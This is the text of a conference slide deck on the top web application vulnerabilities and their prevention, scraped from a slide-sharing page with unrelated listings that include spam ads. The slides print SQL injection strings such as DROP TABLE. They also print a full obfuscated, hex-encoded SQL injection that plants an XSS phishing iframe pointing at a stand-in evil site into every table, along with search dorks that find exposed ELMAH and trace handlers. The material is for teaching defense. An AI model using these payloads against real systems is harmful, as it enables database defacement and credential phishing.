The Newest of the New with Visual Studio and TFS 2012
 
Introduction to Kanban
Introduction to KanbanIntroduction to Kanban
Introduction to Kanban
 
HEALTH MONITORING SYSTEM using mbed NXP LPC11U24
HEALTH MONITORING SYSTEM using mbed NXP LPC11U24HEALTH MONITORING SYSTEM using mbed NXP LPC11U24
HEALTH MONITORING SYSTEM using mbed NXP LPC11U24
 
Digital Enterprise: Industry 4.0
Digital Enterprise: Industry 4.0Digital Enterprise: Industry 4.0
Digital Enterprise: Industry 4.0
 
Industry 4.0 Changes Everything
Industry 4.0 Changes Everything Industry 4.0 Changes Everything
Industry 4.0 Changes Everything
 
Statistik Pengguna Internet Indonesia 2016
Statistik Pengguna Internet Indonesia 2016Statistik Pengguna Internet Indonesia 2016
Statistik Pengguna Internet Indonesia 2016
 
AdoptingSolarWindMN_ConsumerResearch_DanThiede_Aug2014
AdoptingSolarWindMN_ConsumerResearch_DanThiede_Aug2014AdoptingSolarWindMN_ConsumerResearch_DanThiede_Aug2014
AdoptingSolarWindMN_ConsumerResearch_DanThiede_Aug2014
 

Similar to Top web apps security vulnerabilities

Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Application Security Vulnerabilities: OWASP Top 10 -2007
Application Security Vulnerabilities: OWASP Top 10 -2007Application Security Vulnerabilities: OWASP Top 10 -2007
Application Security Vulnerabilities: OWASP Top 10 -2007Vaibhav Gupta
 
Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730chadtindel
 
Soteria Cybersecurity Healthcheck-FB01
Soteria Cybersecurity Healthcheck-FB01Soteria Cybersecurity Healthcheck-FB01
Soteria Cybersecurity Healthcheck-FB01Richard Sullivan
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxFernandoVizer
 
Security Testing - Zap It
Security Testing - Zap ItSecurity Testing - Zap It
Security Testing - Zap ItManjyot Singh
 
Security testing zap it
Security testing zap itSecurity testing zap it
Security testing zap itvodqancr
 
Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentationowasp-pune
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxkarthikvcyber
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxjohnpragasam1
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxazida3
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxcgt38842
 

Similar to Top web apps security vulnerabilities (20)

Web Security
Web SecurityWeb Security
Web Security
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
 
Web security
Web securityWeb security
Web security
 
Application Security Vulnerabilities: OWASP Top 10 -2007
Application Security Vulnerabilities: OWASP Top 10 -2007Application Security Vulnerabilities: OWASP Top 10 -2007
Application Security Vulnerabilities: OWASP Top 10 -2007
 
Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
 
T04505103106
T04505103106T04505103106
T04505103106
 
Soteria Cybersecurity Healthcheck-FB01
Soteria Cybersecurity Healthcheck-FB01Soteria Cybersecurity Healthcheck-FB01
Soteria Cybersecurity Healthcheck-FB01
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Security Testing - Zap It
Security Testing - Zap ItSecurity Testing - Zap It
Security Testing - Zap It
 
Security testing zap it
Security testing zap itSecurity testing zap it
Security testing zap it
 
Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentation
 
Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentation
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 

Recently uploaded

The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsAndolasoft Inc
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Steffen Staab
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...Health
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsJhone kinadey
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceCALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceanilsa9823
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AIABDERRAOUF MEHENNI
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️anilsa9823
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionSolGuruz
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 

Recently uploaded (20)

The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceCALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with Precision
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 

Top web apps security vulnerabilities

  • 1.
  • 2. Top Web Apps Security Vulnerabilities Aleksandar Bozinovski Technical Lead, Seavus
  • 3.
  • 4.
  • 5. Agenda Importance of Web Security HTTP, Sessions, Cookies Injection Cross Site Scripting (XSS) Cross-Site Request Forgery (CSRF) Security Misconfiguration Insecure Direct Object References
  • 6. Famous Quote “Every program has at least two purposes: the one for which it was written, and another for which it wasn't.” -Alan J. Perlis Alan Jay Perlis was an computer scientist known for his pioneering work in programming languages, and is the first recipient of the Turing Award.
  • 7. Bobby Tables string query="INSERT INTO Students VALUES ('"+txtName.Text+"','"+txtSSN.Text+"')"; //Attack: Robert’); DROP TABLE Students;-- INSERT INTO Students VALUES ('Robert'); DROP TABLE Students;--','12345')Robert'); DROP TABLE Students;--
  • 10. HTTP Hypertext Transport Protocol – Language of the Web. Protocol used for communication between web browsers and web servers – Standard RFC 1945, 1996 URL – Uniform Resource Identifier Methods – GET, POST, PUT, HEAD, OPTIONS
  • 11. Statelessness, Cookies  In its nature HTTP it is said to be a stateless protocol. – i.e. from one web page to the next there is nothing in the protocol that allows a web program to maintain program “state” (like a desktop program). – “state” can be maintained by “witchery” or “trickery” if it is needed.  Cookie – piece of data sent from a website and stored in a user's web browser while a user is browsing a website. – The Server sets the cookie in a response. – The client includes the cookies in the Http header for subsequent requests to the server. – Example Cookie: ASP.NET_SessionId=haay355s5g0vm5zotvlncqpr
  • 14. Injection OWASP Definition – Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.
  • 16. SQL Injection Happens when we create query but we fail to validate and sanitize untrusted input data.
  • 17. Queries constructed with concatenating strings are vulnerable to SQL Injection. SQL Queries var categoryId = Request.QueryString["CategoryId"]; var sql = "SELECT * FROM Products WHERE CategoryID=" + categoryId; // If we enter "7 OR 1=1" in query string we end up with: SELECT * FROM Products WHERE CategoryID=7 OR 1=1 // Attacker can use ; to terminate current command and run its own commands. SELECT * FROM Products WHERE CategoryID=7; DROP TABLE Products
  • 18. Validate untrusted data. If input data is supposed to be number, convert it to number or check it with regex. Use parameterized SQL queries instead of strings soup. – Using stored procedures is also a good idea but keep in mind that stored procedures are vulnerable if they concatenate strings on their own. Use ORMs (like Entity Framework) that are inherently resistant to SQL Injection. Prevent SQL Injection
  • 19. Other Injection Attacks LDAP Injection – string ldapSearch = "(cn=" + txtSearchTerm.Text + ")"; Dynamic LINQ Injection – string where = “Table.Contains("" + search + "")"; XPATH Injection – string loginExpression = "/employees/employee[loginID/text()='" + username + "' and passwd/text()='" + password + "']";
  • 20. Cross-Site Scripting (XSS) OWASP Definition – XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
  • 22. Types of XSS Attacks Stored XSS • Stored attacks are those where the injected code is permanently stored on the target servers. • Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved. Reflected XSS • Reflected attacks are those where the injected code is reflected off the web server, such as in an error message, search result. • Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other web server.
  • 23. Built-in protection Modern browsers and servers employ many first line defenses against XSS by default: – ASP.NET Request Validation, present since version 2.0. In ASP.NET 4.0 it is enabled for all types of requests not just pages. To be turned off we must revert to the older mode requestValidationMode="2.0“ – Output encoding. MVC Razor view engine encodes everything by default. XSS is possible only if we use @Html.Raw()
  • 24. Built-in protection – AntiXSS library is by default included in ASP.NET Web Forms 4.5. Can be retrofitted on older web apps. – Google Chrome has built-in anti XSS protection
  • 25. Cross-Site Request Forgery OWASP Definition – A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
  • 27. How CSRF works  Authenticated sessions are persisted via cookies The cookie is sent with every request to the domain  The attacking site recreates a legitimately formed request to the target site Although the request has a malicious payload (query string parameters or post data)  The victim’s browser is tricked into issuing the request For all intents and purposes, the target website views it as a legitimate request
  • 28. CSRF Tokens  To mitigate this risk, we can add randomness via a CSRF token  A token is a random string known to both the legitimate page where the form is and to the browser via a cookie
  • 29. Security Misconfiguration OWASP Definition – Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date, including all code libraries used by the application.
  • 31. Keep up to date Your servers – Windows Server 2012 is arguably more secure than Windows Server 2003 Client browsers (if applicable) – Modern browsers include built-in defenses against most prevalent attacks Keep your frameworks up to date
  • 32. Set Custom Errors, hide YSOD
  • 34. Also don’t forget to turn off ELMAH – Cases with unprotected ELMAH handlers are notorious. – Googledork: inurl:”elmah.axd” DEBUG – Performance penalties – Although not related with direct security risks on its own beware of #if DEBUG statements that can disclose information
  • 35. Also don’t forget to turn off Script execution on folders where not needed – Usually folders where various documents or uploaded files are kept, unless you use App_Data folder. HTTP Access to Logs – Log files can disclose many sensitive details about your web app. It’s best to keep them outside of the web app root. If not possible at least keep them in App_Data.
  • 36. Insecure Direct Object References OWASP Definition – A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
  • 38. Direct Object References – A direct object reference is an observable key used to identify an individual record in database • http://northwind.com/Products?catId=1 • http://northwind.com/Products?catId=3 • http://northwind.com/Products?catId=8
  • 39. Direct Object References – Another example • http://webapp.com/Download?f=DSC01031.JPG • http://webapp.com/Download?f=DSC01032.JPG • http://webapp.com/Download?f=DSC01033.JPG
  • 40. Prevention Implementing proper access control – Validate user data – Implement security checks before using object reference Access via undiscoverable surrogate keys – Integer and natural string types are vulnerable to enumeration – A surrogate key that is not pattern-based can add further obfuscation • A GUID is a good example – However, it is security through obscurity
  • 41. Real example: phishing with obfuscated SQL injection and XSS --1. The malicious query appends script to all text values in all tables in the database DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) and b.name not like '%username%' and b.name not like '%password%' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('update ['+@T+'] set ['+@C+']=['+@C+'] + '' <script>if(!this.pwnd){this.pwnd=true;$(''''<div style="position:absolute;top:0;left:0;z- index:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true" /></div>'''').appendTo(''''body'''');}</script>'' where ['+@C+'] not like ''%http://codecamp.local/EvilSite/Login.aspx%'''); FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
  • 42. Real example : phishing with obfuscated SQL injection and XSS --2. The query is wrtten as one line string 'DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=''u'' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) and b.name not like ''%username%'' and b.name not like ''%password%'' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(''update [''+@T+''] set [''+@C+'']=[''+@C+''] + '''' <script>if(!this.pwnd){this.pwnd=true;$(''''''''<div style="position:absolute;top:0;left:0;z- index:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true" /></div>'''''''').appendTo(''''''''body'''''''');}</script>'''' where [''+@C+''] not like ''''%http://codecamp.local/EvilSite/Login.aspx%''''''); FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor' --3. We cast the query string as varbinary to obfuscate the XSS attack and to bypass XSS filters. SELECT CAST('DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=''u'' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) and b.name not like ''%username%'' and b.name not like ''%password%'' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(''update [''+@T+''] set [''+@C+'']=[''+@C+''] + '''' <script>if(!this.pwnd){this.pwnd=true;$(''''''''<div style="position:absolute;top:0;left:0;z- index:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true" /></div>'''''''').appendTo(''''''''body'''''''');}</script>'''' where [''+@C+''] not like ''''%http://codecamp.local/EvilSite/Login.aspx%''''''); FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor' AS VARBINARY(MAX)) -- result: 0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C6563 7420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622020776865726520612E69643D622E696420616E6420612E78747970653D27752 720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136372920616E6420622E6E616D65206E6F74206C 696B65202725757365726E616D65252720616E6420622E6E616D65206E6F74206C696B6520272570617373776F72642527204F50454E205461626C655F437572736F72204645544348204E45585420 46524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827757064617465205B272B40542B27 5D20736574205B272B40432B275D3D5B272B40432B275D202B202727203C7363726970743E69662821746869732E70776E64297B746869732E70776E643D747275653B2428272727273C64697620 7374796C653D22706F736974696F6E3A6162736F6C7574653B746F703A303B6C6566743A303B7A2D696E6465783A313030303B77696474683A313030253B6865696768743A313030253B223E3C69 6672616D652077696474683D223130302522206865696768743D223130302522207372633D22687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E6173707 822207365616D6C6573733D227472756522202F3E3C2F6469763E27272727292E617070656E64546F2827272727626F647927272727293B7D3C2F7363726970743E2727207768657265205B272B40 432B275D206E6F74206C696B6520272725687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E6173707825272727293B204645544348204E4558542046524F 4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 --4. Final attack is: a' OR 1=1; DECLARE @S CHAR(4000);SET @S = CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656 C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622020776865726520612E69643D622E696420616E6420612E78747970653D 27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136372920616E6420622E6E616D65206E6F7 4206C696B65202725757365726E616D65252720616E6420622E6E616D65206E6F74206C696B6520272570617373776F72642527204F50454E205461626C655F437572736F72204645544348204E455 8542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827757064617465205B272B405 42B275D20736574205B272B40432B275D3D5B272B40432B275D202B202727203C7363726970743E69662821746869732E70776E64297B746869732E70776E643D747275653B2428272727273C646 976207374796C653D22706F736974696F6E3A6162736F6C7574653B746F703A303B6C6566743A303B7A2D696E6465783A313030303B77696474683A313030253B6865696768743A313030253B223 E3C696672616D652077696474683D223130302522206865696768743D223130302522207372633D22687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E61 73707822207365616D6C6573733D227472756522202F3E3C2F6469763E27272727292E617070656E64546F2827272727626F647927272727293B7D3C2F7363726970743E2727207768657265205B2 72B40432B275D206E6F74206C696B6520272725687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E6173707825272727293B204645544348204E455854204 6524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 as CHAR(4000));EXEC(@S)--
  • 44. • Complete electronic evaluation forms on the computers in the hall and enter to win! – Infragistics Ultimate – Telerik DevCraft – JetBrains .NET tools – Semos training vouchers – Pluralsight subscriptions – and many more…

Editor's Notes

  1. A big part of web application security testing involves attempts to force an application to function in a way it was not intended to. Alan Jay Perlis was an computer scientist known for his pioneering work in programming languages and the first recipient of the Turing Award (Nobel prize of computing)
  2. Code: string query = "INSERT INTO Students VALUES ('" + txtStudentName.Text + "‘,’” + txtSSN.Text+ ”’)"; Attack: Robert’); DROP TABLE Students;-- Result: INSERT INTO Students VALUES ('Robert’); DROP TABLE Students;-- ‘,’12345’)
  3. q = "INSERT INTO Students VALUES ('" + txtStudentName.Text + "')"; Robert’); DROP TABLE Students;--
  4. http://www.isi.edu/in-notes/rfc1945.txt
  5. C:\Users\codecamp\AppData\Roaming\Microsoft\Windows\Cookies\Low
  6. Enter OWASP, the Open Web Application Security Project, a non-profit charitable organisation established with the express purpose of promoting secure web application design. OWASP was started on September 9, 2001 By Mark Curphey and Dennis Groves. Since late 2003, Jeff Williams served as the volunteer Chair of OWASP until September 2011. The current chair is Michael Coates, and vice chair is Eoin Keary. The OWASP Foundation, a 501(c)(3) organization (in the USA) was established in 2004 and supports the OWASP infrastructure and projects.
  7. Keep in mind that Trace.axd usually is not protected by authentication. Search on google for: inurl:trace.axd
  8. Googledork: Search on google inurl:elmah.axd
  9. Search on google inurl:elmah.axd